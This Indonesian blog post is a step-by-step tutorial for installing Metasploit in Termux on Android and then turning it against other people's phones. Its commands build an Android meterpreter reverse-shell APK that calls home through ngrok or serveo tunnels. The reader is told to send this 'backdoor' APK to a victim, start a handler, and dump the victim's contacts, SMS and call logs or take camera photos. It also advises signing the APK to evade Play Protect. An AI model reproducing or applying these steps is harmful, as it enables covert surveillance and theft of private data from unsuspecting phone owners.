Wednesday, March 6, 2019

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Pesan singkat : Bagi yang belum paham, saya sarankan untuk membaca lagi Part 1 - Part 7. Tutor ini sekarang sudah work di versi terbaru, segera update dari versi 066, dan versi lama untuk menghindari error Nokogiri.

Dan saya hanya ingin menyampaikan ilmu, dan edukasi saja, tidak mengajarkan untuk merugikan siapapun, gunakan otak anda, ketika membaca artikel ini (artikel di update pada 17 Mei 2019).

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Di zaman sekarang, sudah semakin meningkatnya penggunaan teknologi.

Mulai dari Device (Android & IOs), dan Komputer....Semuanya sudah memiliki performa, dan keamanan yang sangat bagus.

Tapi ingat, sistem itu tidak pernah ada yang aman.

Jika, semua device aman, dan terkendali, maka google tidak akan pernah menawarkan "keamaan" kepada agan, dan perusahaan seperti Mcafee pun akan bangkrut.

 Maka dari itu, walaupun sistem itu di katakan aman, pasti tetap ada celahnya.

Di linux, banyak tools yang di gunakan untuk melakukan pengetesan keamanan, metasploit contohnya.

Metasploit di gunakan untuk pentesting atau membuat tools untuk menyerang keamaan pada suatu device, komputer dan server, dengan cara menyisipkan file berbentuk extensi, software dan apk.

Dan tools tersebut nanti akan di kaitkan dengan backdoor (umumnya pake ngrok), supaya si pembuat tools dapat merekam setiap jejak yang ada di device yang sudah di tanamkan tools tersebut.

Nah sayangnya, Metasploit hanya bisa agan temukan hanya ada pada linux, dan perangkat pc saja.

Tapi, kabar bagus jika agan menggunakan android....karena basic android itu linux, jadi kita bisa gunakan tools ini.

Dan sekarang, akan saya tunjukan cara untuk memasang metasploit.

Berikut Cara Terbaru Memasang Metasploit di TERMUX


Untuk memasang metasploit, pertama kalian harus memasang termux.

Agan gak tau apa itu termux ? baca ulang artikel saya yang part 1 : DI SINI

Kemudian, setelah termux sukses di pasang, agan cukup masukan perintah berikut ini :

*Masukan kode secara berurut, dan proses ini, up sampai 20+ Menit, jadi mohon bersabar.

1. Memasang metasploit package, dengan memasukan kode :

pkg install unstable-repo

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

pkg install metasploit

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

2. Reinstall ruby package, dengan memasukan kode :

pkg install --reinstall ruby

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

3. Memasang bigdecimal gem, dengan memasukan kode :

gem install bigdecimal -v 1.4.3

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

4. Exporting LD_PRELOAD variable, dengan memasukan kode :

export LD_PRELOAD=$LD_PRELOAD:$PREFIX/lib/ruby/gems/2.6.0/gems/bigdecimal-1.4.3/ext/bigdecimal/bigdecimal.so


Dan apabila LD_PRELOAD sudah selesai di export, maka agan bisa menjalankan msfconsole dengan cara membuat new session, lalu mengetikan :

msfconsole

atau

./msfconsole

untuk msfvenom bisa mengetikan :

msfvenom

atau

./msfvenom


Hasil : 


Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Update kode baru :

Untuk memasang metasploit versi terbaru tanpa error nokogiri, masukan perintah berikut secara berurut :

pkg update && pkg upgrade 
 
pkg install unstable-repo

pkg install metasploit

Selesai, dan silahkan di test mengunakan perintah msfconsole dan msfvenom

Selanjutnya, agan sudah mulai bisa membuat payload, untuk melakukan pentesting.

Dan begini cara buatnya gan :

Yang akan kalian butuhkan untuk mengikuti tutor ini :

Bahan 1 - Termux. masih gak tau apa itu termux ? Baca penjelasannya di sini : https://www.cuman-android.com/2018/05/cara-menggunakan-termux-untuk-pemula-part-1.html

Bahan 2 - Metasploit.

Bahan 3 - Private Tunnel, bisa menggunakan Ngrok, bisa juga Serveo.

*Tips : Ngrok cocok untuk sadap jangka pendek, dan serveo cocok untuk jangka panjang, kenapa ?

Karena serveo dapat menggunakan kembali port, dan host yang di pakai sebelumnya, sedangkan ngrok tidak, Paham ?….. saya anggap paham oke.

Dan di sini, saya akan menggunakan ngrok dulu, dan untuk serveo akan saya jelaskan setelahnya.

Baca di sini untuk memasang Ngrok :


Bahan 4 - VPN. bisa yang gratis dan bisa yang berbayar.
.
.
.
.
Sampai sini saya anggap, kalian sudah berhasil memasang metasploit serta ngrok.

Dan selanjutnya, mari kita buat payload menggunakan tunnel di ngrok.

Tutorial Membuat Payload di Metasploit menggunakan Tunnel Ngrok


Langkah 1 – Buka termux lalu masukan perintah berikut : (pastikan vpn nyala, dan ngrok sudah terpasang)

./ngrok tcp 1337

*Port boleh bebas, dan tidak harus 1337

Langkah 2 – kemudian copy kode port forwarding yang telah tersedia di ngrok, contoh seperti gambar di bawah ini (yang di garis bawahi) :


Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR


Langkah 3 – Buka sesi baru, dan jangan tutup ngrok. Kemudian jalankan perintah berikut ini :

termux-setup-storage

Langkah 4 – lalu buka sesi baru, dan lanjutkan dengan membuat apk dengan perintah msfvenom. Dan tunggu sampai prosesnya selesai, maka nanti akan muncul file apk di memori internal agan, ukurannya sekitar 8kb-10kb.

Perintahnya : 

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=(PORT_AGAN) R> /sdcard/NAMAAPK.apk

*port_agan : port yang ada di langkah 2

*NAMAAPK : di sini nama untuk file apk agan, bebas.

Contoh : msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15032 R> /sdcard/backdor.apk

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Langkah 5 – biarkan semua berjalan, dan pastikan apk sudah di buat dan berada di memori internal.

Kemudian kirim apk ke hp korban, lalu pasang, dan buka apknya.

Langkah 6 – Balik ke termux, kemudian jalankan metasploit di sesi baru, dengan memasukan perintah

msfconsole

Kemudian tunggu sampai terbuka. maka nanti akan muncul msf>.

Langkah 7 – Lalu mari kita buat jaringan reserve tcp dengan memasukan perintah di bawah ini setelah msf> :

msf>use exploit/multi/handler
msf>set payload android/meterpreter/reverse_tcp
msf>set LHOST 0.0.0.0
msf>set LPORT 1337 (harus sesuai dengan port awal ngrok)
msf>run

*set LPORT bisa di ganti sesuai dengan port yang di gunakan di ngrok, contoh 1234,1567, atau 4444.

Jika behasil, maka akan tampil seperti di bawah ini : 


Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Langkah 8 – setelah muncul meterpreter> seperti di atas, agan sudah bisa mulai mengoperasikan beberapa fitur di android korban, dan langsung eksekusi aja pake perintah di bawah ini :

1. Perintah untuk memfoto lewat kamera depan (bug) : 

webcam_snap -i 2 -p storage/downloads/cuman-android-front.jpg

2. Perintah untuk memfoto lewat kamera belakang (bug) :

webcam_snap -i 1 -p storage/downloads/cuman-android-back.jpg

3. Perintah untuk menyaring semua kontak list :

dump_contacts -o storage/downloads/kontak-korban.txt

4.Perintah untuk menyaring semua sms atau pesan masuk :

dump_sms -o storage/downloads/sms-korban.txt

5. Perintah untuk menyaring semua log telefon :

dump_calllog -o storage/downloads/telfon-log-korban.txt

Hasil ?

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Tutorial Membuat Payload di Metasploit menggunakan Tunnel Serveo.net


Langkah 1 – Pasang openssh di termux dengan mengetikan perintah :

pkg install openssh

Langkah 2 – Buat jaringan private melalui serveo (Jika failed, gunakan port lain)

ssh -R (Port-bebas):localhost:(Port-bebas) serveo.net

Contoh : ssh -R 7898:localhost:7898 serveo.net

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Langkah 3 – Lalu, lanjutkan dengan membuat apk. Prosesnya sama seperti menggunakan ngrok, hanya saja host, dan portnya yang berbeda.

Perintahnya : 

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=(PORT_ANDA) R> /sdcard/NAMAAPK.apk

Contoh : msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=7898 R> /sdcard/backdor.apk

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Langkah 4 – Lalu mari kita buat jaringan reserve tcp dengan memasukan perintah di bawah ini setelah msf>

msf>use exploit/multi/handler
msf>set payload android/meterpreter/reverse_tcp
msf>set LHOST localhost
msf>set LPORT 7898 (harus sesuai dengan port)
msf>exploit -j -z

*set LPORT bisa di ganti sesuai dengan port yang di gunakan di serveo, contoh 8983,1567, atau 4444. dan ingat, harus sama.

Langkah 5 – Kirim apk yang tadi sudah di buat ke hp korban, pasang kemudian buka. Maka sessions 1 akan terbuat. Jika sudah terbuat, maka masukan perintah :  (pastikan sessions satu sudah di konfirmasi terbuka)

sessions -i 1

Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

Langkah 6 – Setelah terbuat, maka selanjutnya agan dapat mulai dump sms atau sekedar mengambil foto menggunakan perintah yang sudah saya jelaskan sebelumnya.

Catatan :

*bug saat ambil foto, mungkin karena versi metasploit
*untuk menghindari play protect, coba di sign apknya. Saya lupa buat, bisa bahas di grup untuk caranya.
*NGROK bagus untuk jangka pendek, dan jangan sign aplikasi (tidak bisa sign)
*SERVEO bagus untuk janga panjang, dan bisa sign aplikasi (bisa sign)

Sekian, dan sampai jumpa di tutorial berikutnya.
Part lanjutan untuk belajar termux :

#Part ke 2 :

- Cara Menggunakan Termux untuk Pemula, Part 2 : Pemasangan dan Penggunaan Package di Termux [Guide] - Tanpa Root  

#Part ke 3 :

Cara Menggunakan Termux untuk Pemula, Part 3 : Cara Mencari Kelemahan sebuah website hanya bermodalkan hp Android - Tanpa Root

#Part ke 4 :

Cara Menggunakan Termux untuk Pemula, Part 4 : Cara Memasang Hacking Toolbox, dan Menggunakannya (Lazymux) - Tanpa Root

#Part ke 5 :

- Cara Menggunakan Termux untuk Pemula, Part 5 : Nambang Crypto pake Termux - Tnapa Root

#Part ke 6 :

Cara Menggunakan Termux untuk Pemula, Part 6 : Membuat Script Sendiri  - Tanpa Root

#Part ke 7 :

- Cara Menggunakan Termux untuk Menengah, Part 7 : Cara Hack atau Inject Sebuah Website Menggunakan SQLMAP - 100% Real, dan Tanpa Root

#Part ke 8 :

- Cara Menggunakan Termux untuk Menengah, Part 8 : Cara Terbaru Memasang Metasploit di TERMUX, Tanpa ROOT & ERROR

#Part ke 9 :

- Cara Menggunakan Termux untuk Menengah, Part 9 : Cara Terbaru Memasang package NGROK di Termux Android [TANPA ROOT]

#Part ke 10 :

- Cara Menggunakan Termux untuk Menengah, Part 10 : Seni menggunakan weeman untuk menjebak seseorang menggunakan Termux (Tanpa Root)

#Part ke 11 :

- Cara Menggunakan Termux untuk Menengah, Part 11 : Cara Paling Halal Mendapatkan Follower Instagram Melalui Termux Android [100% Gratis + Tanpa Root]

#Part ke 12 :

- Cara Menggunakan Termux untuk Expert , Part 12 : Cara Bobol Whatsapp di Hp Android Orang Lain via Metasploit 

#Part ke 13 : Belum Rilis

Disqus Comments